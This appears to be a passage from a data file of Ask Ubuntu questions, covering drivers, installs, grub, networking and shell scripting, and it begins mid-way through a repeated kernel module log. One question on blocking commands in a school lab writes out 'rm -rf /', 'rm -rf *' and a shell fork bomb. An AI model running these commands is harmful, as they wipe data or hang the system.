x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 9013.854592 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 9018.529832 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 9018.568667 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 9023.300006 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 9023.385362 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 9028.073612 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 9028.099705 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio
509732	terminal message `` access control disabled ''	every time i open up the terminal the message access control disabled , clients can connect from any host pops up in the first line . then the terminal behaves as usual , no errors at all . but this seems a security issue , and i 'm not sure where it comes from . i 'm using ubuntu 12.04 . it started appearing while i was trying to resolve something related to video drivers , which are giving me a big headache . i do n't know what i did ( copy-pasting terminal commands without even reading it , i know , i deserve this ) or where to start looking for a solution ...
509735	nvidia 331.89 super + w causes black window	when i am hitting super + w and choosing one of active window it opens . but when i am mazimizing another minimized window i am getting blank black window , if i minimize then maximize it again it works . tried 340.24 drivers - but they are totally unusable because of interface corruption in firefox , thunderbird , libreoffice . 331.89 seems stable except this annoying black window . i am using gtx 750 ti
509738	ubuntu 12.04 becomes unresponsive	i have installed ubuntu 12.04 lts on my lenevo b490 . system : intel® core™ i3-3110m cpu @ 2.40ghz × 4 memory : 3.5gib os type : 32-bit disk : 305.8 gb it 's a dual boot with windows 7 and ubuntu . of late , i notice that the system becomes unresponsive . the screen freezes and i am able to proceed with my work only after a hard shutdown . screen freeze has happened during browsing in firefox , activating skype and as simple as clicking a link . the logs does n't have much information apart from these . i went through the other threads which speak about aptdaemon but they 've occurred in different scenarios . has anyone faced similar issues ? why does this happen ? aug 9 15:45:11 lt-nb-108u aptdaemon : info : initializing daemon aug 9 15:45:11 lt-nb-108u aptdaemon.packagekit : info : initializing packagekit compat layer aug 9 15:45:11 lt-nb-108u dbus [ 899 ] : [ system ] successfully activated service 'org.freedesktop.packagekit' aug 9 15:45:11 lt-nb-108u aptdaemon.packagekit : info : initializing packagekit transaction aug 9 15:45:11 lt-nb-108u aptdaemon.worker : info : simulating trans : /org/debian/apt/transaction/55fbc4bc72f94789a94aa0475d881910 aug 9 15:45:11 lt-nb-108u aptdaemon.worker : info : processing transaction /org/debian/apt/transaction/55fbc4bc72f94789a94aa0475d881910 aug 9 15:45:14 lt-nb-108u aptdaemon.packagekit : info : get updates ( ) aug 9 15:45:14 lt-nb-108u aptdaemon.worker : info : finished transaction /org/debian/apt/transaction/55fbc4bc72f94789a94aa0475d881910 aug 9 15:48:39 lt-nb-108u kernel : [ 299.650144 ] [ hardware error ] : machine check events logged aug 9 15:51:11 lt-nb-108u aptdaemon : info : quitting due to inactivity aug 9 15:51:11 lt-nb-108u aptdaemon : info : quitting was requested aug 9 15:56:44 lt-nb-108u kernel : [ 783.905816 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 14070000 , was 14000000
509741	webcam not detected- toshiba satellite nb10t-a-101	i just have installed the ubuntu 14.04.1 on my new toshiba satellite nb10t-a-101 , and everything seems to work fine , except the webcam . cheese says `` no device found '' , skype also does n't see it . i see someone had the same problem , but did n't got suficient help from the toshiba forum : http : //forums.computers.toshiba-europe.com/forums/thread.jspa ? threadid=77998 & tstart=0 # 305357 the laptop description lists : integrated 0.9mp hd web camera ( 1,280 x 720 ) with built-in microphone the microphone does work , it 's only the camera that does not . how can i find and install the correct drivers ?
509742	vlc player installation ubuntu 14.04	i have searched for many options on internet to install vlc player on ubuntu 14.04 , but nothing is working for me . please could you help me with this issue . errors : root @ hiteshb-to-be-filled-by-o-e-m : ~ # apt-get install vlc reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libavcodec54 libavformat54 libchromaprint0 libmp3lame0 libvlc5 libvlccore7 vlc-data vlc-nox vlc-plugin-notify vlc-plugin-pulse suggested packages : libchromaprint-tools python-acoustid videolan-doc recommended packages : libdvdcss2 the following new packages will be installed : libavcodec54 libavformat54 libchromaprint0 libmp3lame0 libvlc5 libvlccore7 vlc vlc-data vlc-nox vlc-plugin-notify vlc-plugin-pulse 0 upgraded , 11 newly installed , 0 to remove and 0 not upgraded . e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
509743	fullscreen and repeat video with totem player	i want to open a video from command line and i want the video to be opened as fullscreen and be repeated forever . i searched for fullscreen , and found the -- fullscreen switch in totem . however , there 's no repeat or loop option . how can i show a video and repeat itself with totem or any other simple player from command line ? like : totem -- fullscreen -- repeat video.mp4 thank you very much in advance .
509744	how do i edit a system file when i am root user but i receive `` you are not in the sudoers file '' ?	i am using ubuntu 12.04 ( lts ) 64 bit . i have edited /etc/group and added my username erfan in front of vboxusers as following : root : x:0 : daemon : x:1 : bin : x:2 : . . . erfan : x:1000 : sambashare : x:124 : debian-xfs : x:125 : vboxusers : x:126 : erfan vboxsf : x:127 : guest-59wkhg : x:128 : after this change , i can not use the sudo command and i receive following message : '' erfan is not in the sudoers file . this incident will be reported . '' i can not install any package and manage my operating system . i think if i can find a way to delete my user name erfan from in front of vboxusers , then this problem will be resolved . could you give me an idea to delete it and edit the group file ? or any way to resolve this problem ?
509749	how to install old version of gcc on ubuntu 14.04	i need to install gcc 3.0 on ubuntu 14.04 . i tried to compile sources but it throws error . is possible to install gcc 3.0 from repository ? how to do that ? this does not work for me . apt-get update command throws this : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy/universe/source/sources 404 not found [ ip : 91.189.91.13 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy/universe/binary-amd64/packages 404 not found [ ip : 91.189.91.13 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy/universe/binary-i386/packages 404 not found [ ip : 91.189.91.13 80 ] e : some index files failed to download . they have been ignored , or old ones used instead .
509750	uport 1150 version problem in ubuntu	i have a uport 1150 and my operating system is that '' linux version 3.11.0-26-generic ( buildd @ komainu ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 45~precise1-ubuntu smp tue jul 15 04:02:35 utc 2014 `` . i am trying to load driver of uport 1150 but i have getting error is that hamdi @ eng : ~/moxa/mxu11x0 $ make install tee : build.log : permission denied ************************************************************************ ubuntu 12.04.5 lts \l 3.11.0-26-generic moxa uport 11x0 series driver ver 1.3 release date : 2012/07/13 ************************************************************************ **********************************warning******************************* moxa uport 11x0 series driver may not be compatible with linux kernel versions newer than 3.4.4 . to download the latest driver , please visit moxa at : http : //www.moxa.com if you have questions , please contact moxa support at : support @ moxa.com ************************************************************************ make [ 1 ] : *** [ envchk ] error 1 make : *** [ install ] error 2 why am i getting this error although latest version ? is there solution of this problem ? thanks edit : hamdi @ eng : ~/moxa/mxu11x0 $ ls -la | head -n 15 total 36 drwxr-xr-x 3 hamdi hamdi 4096 jul 13 2012 . drwxrwxr-x 4 hamdi hamdi 4096 aug 11 13:07 .. drwxr-xr-x 2 hamdi hamdi 4096 aug 11 11:42 driver -rw-r -- r -- 1 hamdi hamdi 172 mar 28 2012 makefile -rwxr -- r -- 1 hamdi hamdi 883 jul 6 2012 mxinstall -rw-r -- r -- 1 hamdi hamdi 9946 jul 13 2012 readme.txt -rw-r -- r -- 1 hamdi hamdi 1545 jul 13 2012 version.txt
509758	delete armory and return disk space	i am running ubuntu through fusion vm . i installed armory but the mac would not have enough disk space for it . i removed it through the software centre but notice the disk space available on the osx side has not gone back up . how can i make sure that all the downloads from there has been deleted and also return that unused partition back to osx ?
509759	is it possible to turn the .iso file into a .exe file ?	i 've downloaded trusty ( 14.04 ) and it 's an .iso file . i knew what i had to do , i got a thingy to mount the image ( slysoft to be precise ) and mounted the .iso and up came the ubuntu thing running through what to do , so i restarted my machine and it did n't boot with ubuntu , instead it was the normal boot up . ( i 'm using vista [ the worst os ever made ] to be clear ) . so , i gots to thinking maybe i could just convert the file into a .exe file and then install it through that , but is that possible ? if not , what should i do ?
509761	can not access ubuntu computer on my windows xp pc	i can see my ubuntu machine in the work group of my windows xp pc but when i click it says that it is not accessible/no permission/the parameter is incorrect etc .
509765	which of the ubuntu versions suitable for toshiba harman/kardon ?	i am presently running a windows 7 32bit operating system , and i just decided to start using ubuntu as suggested by a friend . i could not install windows 7 64 because my computers specifications did not meet . i am not sure if its the same case with ubuntu , or is there any guarantee that my 1.50gb ram and 60gb hard diskcan run it ?
509767	ubuntu 12.04 64bit for intel processor ?	how to get ubundu 12.04 64bit for intel processor for installing in my laptop. ? i could n't find any link for it on internet .
509769	good places to start for a person new to linux ?	i recently added ubuntu 14.04 to my laptop to get familiar with it . i am working on a network security degree and i wanted to get accustomed to more than just windows . i have used fedora 16 terminal commands in netlab courses , however i feel that fedora 16 is probably a lot more watered down than ubuntu . so essentially what i am asking is for a person who is used to windows , what type of guides should i be looking for and where is the best place to find them ? thanks in advance .
509774	i unchecked wireless and now its grayed out cant tun it back on	so had a brain fart unchecked wifi now its grayed out cant reconnect to wifi soft no hard no tied network manager network all settings i could find and google it and nobody has the same problem that i can find tried fn-f2 nothing
509777	what folder should i install chrome in ?	i just installed chrome with these instructions on ubuntu 14.04. sudo apt-get install libxss1 libappindicator1 libindicator7 wget https : //dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb sudo dpkg -i google-chrome*.deb but i installed it in my home folder . i 'm quite new to ubuntu and not sure where i 'm meant to install it ? when i run the 'ls ' command in my home folder i see the google-chrome-stable_current_amd64.deb in red . can i move it or do i have to delete and reinstall it somewhere else ? ( how would i delete it ? )
509783	okular crashing in xubuntu14.04 for latex generated pdfs with embedded videos	i have used the same method , package and set-up for generating and viewing latex generated pdfs with embedded video in okular . it is working fine with say okular -- version qt : 4.8.3 kde development platform : 4.9.5 okular : 0.15.5 it also worked fine with linux mint 13.10 and xubuntu 13.04 in-built okular . but now with xubuntu 14.04 lts and okular -- version qt : 4.8.6 kde development platform : 4.13.2 okular : 0.19.2 okular crashes always when there is video embedded in a latex generated .pdfs ( i checked with latex generated pdfs ) . i do not know whether it is true generally or not . would anyone please help me out ? how can i solve this problem ? as suggested i pasted a small working code . \documentclass { beamer } \usepackage { graphicx } \usepackage { multimedia } \begin { document } \begin { frame } { example } \begin { figure } [ h ! ] \centering \movie [ label=show3 , width=1.0\textwidth , poster , autostart , showcontrols , loop ] { \includegraphics [ width=1.0\textwidth ] { image.png } } { image.mp4 } \caption { image } \end { figure } \end { frame } \end { document }
509784	numeric pad always enter digits	in kde there is an option to keep number work as if it is on : . but it does not work in edit area of qt creator . how can i solve this problem ?
509787	elementary os bios entry still there , after installing and deleting eos fraya beta	ok , so i wanted to test elementary os freya beta for a couple of days . since i have ssd , i wanted to test it on it , not a live usb ( slower ) . so i resized my ubuntu partition , created a new one , and installed freya beta on it . but , when i restarted computer , ubuntu booted , without asking me which os i wan na boot . i then restarted the computer again and selected elementary os partition from boot selection menu . but , instead of elementary , ubuntu booted . i then deleted elementary partition , and merged it into ubuntu partition ( lefting 1 mb unallocated ) . so now , i have same size of ubuntu partition ( -1 mb ) as before . but the problem is , in bios boot menu , there is still eos entry , which when i select it , boots ubuntu . is it possible to remove it ? i have modified grub a long time ago to speed up booting : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=0 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux thank you !
509791	alsamixer : no such file or directory	i am trying to setup a minimal system from the ubuntu 14.04 netboot iso . i installed the system using defaults only ( except partitioning ) . after the install was finished i restarted , edited sources.list to add extras and partners , fetched key for partners , updated apt and installed xorg slim alsa-base alsa-utils i3 . after it was finished installing i added myself to audio group and rebooted . after the reboot i logged in with slim , did the first-run i3 config , did an apt-get update and apt-get dist-upgrade just for fun ( of course nothing had changed ) and verified that i was in the audio group with `` groups '' . then i type alsamixer and get can not open mixer : no such file or directory the system does sees the device . aplay -l produces : **** list of playback hardware devices **** card 1 : set [ usb headphone set ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0 lsmod | grep ^snd produces : snd_usb_audio 127638 0 snd_usbmidi_lib 24367 1 snd_usb_audio snd_hwdep 13272 1 snd_usb_audio snd_pcm 85501 1 snd_usb_audio snd_page_alloc 14230 1 snd_pcm snd_seq_midi 13132 0 snd_seq_midi_event 14475 1 snd_seq_midi snd_rawmidi 25135 2 snd_usbmidi_lib , snd_seq_midi snd_seq 55383 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14137 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 28584 2 snd_pcm , snd_seq snd 60871 9 snd_usb_audio , snd_hwdep , snd_timer , snd_pcm , snd_seq , snd_rawmidi , snd_usbmidi_lib , snd_seq_device , snd_seq _midi i tried this yesterday and installing pulseaudio fixed it but i do n't want pulseaudio as this is a pretty old box and i am trying to conserve resources . any help greatly appreciated . i have googled for a couple days trying , and now i 'm here . i can see that i am not the first person to have this problem on here , but i have yet to see a solution . i have posted the same info in ubuntu forums . whoever provides a solution , i will share with the other .
509792	how can i set my lamp server into a static ip address of 10.10.0.23 ?	i 'm using ubuntu12.04 server on virtual box and it seems it only allows me to use class c addresses as this one , auto eth0 iface eth0 inet static address 192.168.0.23 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.1 is it possible to change it to auto eth0 iface eth0 inet static address 10.10.0.23 netmask 255.0.0.0 network 10.0.0.0 broadcast 10.255.255.255 gateway 10.10.0.1
509795	how to write a portable shell script with error handling	i have had relatively good success at writing portable , full-featured shell shell scripts by using /bin/sh , for example : # ! /bin/sh trap 'echo `` error on line $ lineno '' ; exit 1 ' err while read line do echo `` + $ line '' done < file.txt this works on bsd because /bin/sh is typically an alias to ksh $ ls -li /bin/ { sh , ksh } 26768 -r-xr-xr-x 3 root bin 418612 jun 18 17:41 /bin/ksh 26768 -r-xr-xr-x 3 root bin 418612 jun 18 17:41 /bin/sh while on macos and many linux distros simply symlink /bin/sh to bash $ ls -li /bin/ { sh , bash } 17170438 -rwxr-xr-x 1 root root 938832 jul 18 2013 /bin/bash 17170540 lrwxrwxrwx 1 root root 4 feb 19 12:42 /bin/sh - > bash if these two conditions are true then i can use a relatively rich feature set common to both ksh and bash . on ubuntu the default shell only supports posix features . is it still possible to write a cross-platform shell script that also incorporates error handling ? edit ( 2014-08-18 ) the solution i came up with was to auto-upgrade the script if the given shell does n't understand the err trap # ! /bin/sh trap 'echo `` error on line $ lineno '' ; exit 1 ' err || exec bash $ 0 `` $ @ '' this allows me to write reasonably portable shell scripts that only require bash if the default shell does n't support ksh features .
509797	xubuntu can´t connect wireless to internet	computer : fujitsu-siemens esprimo p2510 ( 6-7 years old ) os : win xp pro computer safty : f-secure 2014 wireless internet : telia huawei e5776 4g wifi router ( the router is ok and works with my other units . ) first i have a question about mounting . when i start xubuntu , i have on the desk three icons for my mobile units . wifi , elements hd and system which not yet are mounted . if i right-klick for example on the icon for wifi and chooses “mount” i get the message “the volume is now mounted on bert.wifi.” i mount the other two the same way but when i start xubuntu the next time are they still not mounted . do i have to mount every time i start . when i start firefox i get the following message server not found . firefox can´t find the server at start ubuntu.com check the address for typing errors such as ww.example.com instead of www.example.com if you are unable to load any pages , check your computers network connection . if your computer or network is protected by a firewall or proxy , make sure that firefox is permitted to access the web . i have tried but i can´t load any pages . i shut down my firewall but the result was the same . i know very little about computers in general and , if it is possible , even less about xubuntu . i am most grateful if you can give me instructions step by step where and how i can do the necessary settings for connection to the internet . best regards axel svensson norrtälje sweden .
509799	linking to man page sections ?	online man pages in html with section anchors ? it would be good to have an online version of the ubuntu man pages with direct links into subsections . that would allow to point someone to the relevant documentation in many cases - for example in answers of various stackexchange sites . i will describe how a full solution might look , and in which ways that would be useful . i do not think a complete solution is available somewhere , so the question is which partial solutions exist today ? for example , somehow systematic ways to search into the man pages , instead of linking , would be a partial solution . the man pages at manpages.ubuntu.com solve most of the problem , but they do not have anchors on the headings or sections . that means , if i want to point to the section `` parameter expansion '' in man bash online , i have to use see `` parameter expansion '' in man bash [ ... and use your browser to search for `` parameter expansion '' ] this opens the bash man page at the top , as one long web page . in the shell , i can say see man bash | less `` +/parameter expansion '' which jumps to the right place at startup . it would be really helpful to have link anchors named like the headings they point to . anchors named by some kind of index number would still help , but require a manual lookup on the actual web page to use it . as it is not difficult on html level to add anchors to headings , i 'm sure such man pages exist ; but is there a collection of the ubuntu man pages with anchors online somewhere , or at least a good subset ? example code the header of section `` parameter expansion '' from http : //manpages.ubuntu.com/bash which kind-of-redirects to http : //manpages.ubuntu.com/manpages/trusty/en/man1/bash.1.html [ ... ] tildes in assignments to < b > path < /b > , < b > mailpath < /b > , and < b > cdpath < /b > , and the shell assigns the expanded value . < b > parameter < /b > < b > expansion < /b > the ` < b > $ < /b > ' character introduces parameter expansion , command substitution , or arithmetic expansion . the parameter name or symbol to be expanded [ ... ] to be able to link directly to this section , we need something like : [ ... ] tildes in assignments to < b > path < /b > , < b > mailpath < /b > , and < b > cdpath < /b > , and the shell assigns the expanded value . < a href= '' # parameterexpansion '' > < b > parameter < /b > < b > expansion < /b > < /a > the ` < b > $ < /b > ' character introduces parameter expansion , command substitution , or arithmetic expansion . the parameter name or symbol to be expanded [ ... ] this adds one tag to the html code , and one attribute , the section name without spaces : < b > parameter < /b > < b > expansion < /b > < a href= '' # parameterexpansion '' > < b > parameter < /b > < b > expansion < /b > < /a > now , we can link to the section like http : //manpages.ubuntu.com/bash # parameterexpansion or even manpages.ubuntu.com/bash # parameterexpansion which uses a foot note and is is written like [ manpages.ubuntu.com/bash # parameterexpansion ] [ 6 ] use of other reference documents in many cases , there are alternative reference documents available , appart from the man page . these often have a good link structure that is used to link from a table of content to the sections , just what we need . but this does not solve the general problem , as there is no common way to find whether/where such a document existst , and to make use of the link structure . for the bash example used above , the bash reference manual could be used as an individual solution looked up manually : bash reference manual section shell-parameter-expansion written as [ bash reference manual section shell-parameter-expansion ] ( http : //www.gnu.org/software/bash/manual/bash.html # shell-parameter-expansion ) proposed implementation to propose actually implementing this idea at manpages.ubuntu.com , i filed a closely related bug/enhancement request on the associated project `` ubuntu-manpage-repository '' : launchpad # 1355271 : use html a tags to allow external links to subsections of man pages
509800	ubuntu calculator in dash	i want to install the calculator in dash in ubuntu 14.04 , i installed unity-scope-calculator , but still nothing , i read i can do calc : 3 + 5 , but i want this to happen automatically when i do 3 + 5 , how can i do this ? if this matters , i disabled the thing that searches the internet for everything i search on dash . thanks .
509802	how to create a custom errordocument page in ubuntu 14.04 ?	i am new to ubuntu and i am using ubuntu server 14.04 . now i want to use my own design html web pages as my server status errors like on 404 etc . i tried my own way but not getting my designed page and i am getting server default error page when i am opening 192.168.1.99/404 that document is not available in my var/www/ as attached below . i have index.html , 404.html , .htaccess files in my var/www/ folder . my .htaccess files contain errordocument 404 /404.html line only . i did n't change any default setting . i just install ubuntu server 14.04 and using it via terminal . can you tell me what to do now ?
509804	how to upgrade latest linux kernel offline .	how to upgrade linux kernel offline in ubuntu 14.04 .
509805	documents stuck in printer queue	i am useless with computers i know but some documents are - i think - stuck in teh queue and thus nothing will print . i have seen other answers which suggest that i should enter lpstat -o in a command line . but what does that mean ? where is a command line ?
509809	much lower temps on ubuntu	i 've noticed that cpu temps and gpu on my laptop are much lower on ubuntu than windows 7 . on windows temperature is like 50 celsius to 58 and on ubuntu 40 to 50 max . cooling is also much cooler on ubuntu . i 'm wondering what is causing that difference . can you help me find an answer ? thanks for reply .
509815	block certain dangerous commands ?	in my high school there are few computer having ubuntu 14.04 installed and many students know the root password , how can i block/disable certain dangerous commands like : - rm -rf / rm -rf * : ( ) { : | : & } ; : to avoid data loss ?
509818	utorrent server only working with 'sudo -i ' option	apparently it 's not a working/not working issue . i have setup utorrent server in my xubuntu 14.04 following these instructions . how do i install utorrent on ubuntu 14.04 other instructions seem specific to older versions of the os worked great except for two things that had to change from the original set of instructions 1 . the configuration specified there says the webgui folder is in /usr/local/utorrent/webui/ when it actually should be web since no specifications were given during the unzip operation i have to start utorrent each time with the following command sudo -i utorrent -settingspath /usr/local/utorrent/ now why is that ? as far as i know sudo -i option is used so that the dotfiles of the root user are used . but how come this is not required by the original poster ?
509821	ca n't run minecraft with ubuntu or wine since update to 14.04	i have followed other available advice on minecraft , java , etc , but ca n't find anything that works . here is my story : for a couple years i have been successfully running a cracked windows version of minecraft with wine , it worked perfectly . after having problems updating to 14.04 and deciding to do a fresh install , i never bothered to reinstall minecraft . recently , i decided to pay for a legit version of minecraft and found that there is now a linux version , so i created an account and downloaded the files . however , attempts to install this version were initially met with glx errors , and after following some fixes the new error is that minecraft requires a kernel of 3.6 or above . uname -r shows my kernel is 3.4 , and all attempts to upgrade to a newer kernel have failed , or more accurately , not had any effect . frustrated , i attempted to install the minecraft .exe in wine the way i used to run it , but each time i am informed that my java is not up to date ( application requires a java runtime environment 1.6.0 ) , any attempt to update fails with the following error message : `` installation failed , the wizard was interrupted before java 7 update 67 could be completely installed . to complete installation at another time , please run setup again . '' following any fixes i could find broke so many things on my machine that i ended up doing a powerwash and starting all over again with a fresh install , but i can still not successfully upgrade my kernel or make minecraft work in wine . needless to say , my patience is nearing an end . to summarize , i have two basic questions : 1. why ca n't i upgrade my kernel ? 2. why , suddenly , ca n't i as an alternative install minecraft in wine as i used to have it ? any other information needed from me will be happily provided , thanks in advance for any assistance . running ubuntu 14.04 with xfce on acer c720 chromebook . uname -a = linux localhost 3.4.0 # 1 smp thu jul 24 15:16:00 pdt 2014 x86_64 x86_64 x86_64 gnu/linux '' edit : more info $ ls /usr/lib/jvm/ java-1.6.0-openjdk-amd64 java-6-openjdk-amd64 java-7-openjdk-amd64 java-1.7.0-openjdk-amd64 java-6-openjdk-common ( trusty ) jonboy @ localhost : ~ $ java -version java version `` 1.7.0_55 '' openjdk runtime environment ( icedtea 2.4.7 ) ( 7u55-2.4.7-1ubuntu1 ) openjdk 64-bit server vm ( build 24.51-b03 , mixed mode )
